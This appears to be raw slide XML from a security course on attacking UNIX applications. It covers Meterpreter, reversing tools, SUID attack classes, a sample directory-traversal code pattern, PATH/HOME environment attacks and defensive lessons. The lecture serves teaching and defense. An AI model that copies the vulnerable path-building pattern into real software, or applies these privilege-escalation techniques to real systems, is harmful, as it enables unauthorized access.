              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> &gt; show</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1130314729"/>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Meterpreter</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a payload that has advanced features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Completely resides in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provides remote access through an encrypted connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Supports a wide variety of commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Core commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>System commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File system commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User interface commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Privacy commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="559308941"/>
      </p:ext>
    </p:extLst>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normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Applications can be exploited by </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Providing unexpected inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Generating unexpected environmental conditions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sanitizing user inputs and understanding environmental dependencies is key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The use of safe coding, safe languages, and existing protection mechanisms can greatly reduce the risk of exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application-logic attacks are still possible </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="76944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Radare</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Radare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a program analysis tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rada.re</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/r/ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Supports reversing and vulnerability analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disassembling of binaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Forensic analysis </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Supports scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Supports collaborative analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Free</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="93700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IDA Pro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IDA Pro is the state-of-the-art tool for reversing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.hex-rays.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/products/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It supports disassembling of binary programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Supports </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>decompilation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Hex-Rays </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>decompiler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be integrated with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and other debuggers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is a commercial product (expensive)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A limited version is available for free</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="75866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Hopper</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disassembler that supports sophisticated analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.hopperapp.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Includes a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>decompiler</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is a commercial product but:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It can be used for free (with limitations)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is not very expensive (~90$)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="121931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Attacking UNIX Systems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote attacks against a network service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote attacks against the operating system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote attacks against a browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Local attacks against SUID applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Local attacks against the operating system </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="132471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Grp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking UNIX Applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="514051" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>99% of the local vulnerabilities in UNIX systems exploit SUID-root programs to obtain root privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1% of the attacks target the operating system kernel itself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking SUID applications is based on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Startup: command line, environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>During execution: dynamic-linked objects, file input, socket input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Interaction with the environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File system: creation of files, access to files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes: signals, invocation of other commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sometimes defining the boundaries of an application is not easy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="145580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4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4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40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40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40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40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405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405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1405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140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 Classes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File access attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Path attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TOCTTOU</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File handler reuse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Memory Corruption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack corruption </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Heap corruption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Format string exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="118330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 Access Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access to files in the file system is performed by using path strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If an attacker has a way to control how or when a privileged application builds a path string, it can lure the application into violating the security policy of the system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="208478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Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These vulnerabilities are flaws in the overall logic of the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lack of authentication and/or authorization checks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Erroneous trust assumptions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These vulnerabilities are the most difficult to identify automatically because they require a clear understanding of the functionality implemented by the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Confused Deputy problem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="77816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Dot-Dot Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An application builds a path by concatenating a path prefix with values provided by the user (the attacker)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>path = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>("/&lt;initial path&gt;/", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>user_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>free_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>file = open(path, O_RDWR);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The user (attacker) provides a filename containing a number of “..” that allow for escaping from the directory and access any file in the file system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also called: directory traversal attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="58578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Learned</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input provided by the user should be heavily sanitized before being used in creating a path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() can be used to confine an application to a subset of the file system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="128518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 and HOME Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The PATH environment variable determines how the shell searches for commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If an application invokes commands without specifying the complete path, it is possible to induce an application to execute a different version (controlled by the attacker) of the external command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execlp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() use the shell PATH variable to locate applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The HOME environment variable determines how the home directory path is expanded by the shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If an application uses using a home-relative path  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(e.g., ~/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>myfile.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>), an attacker can modify his/her $HOME variable to control the execution of commands (or the access to files)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="78542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Learned</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Absolute paths should always be used when executing external commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
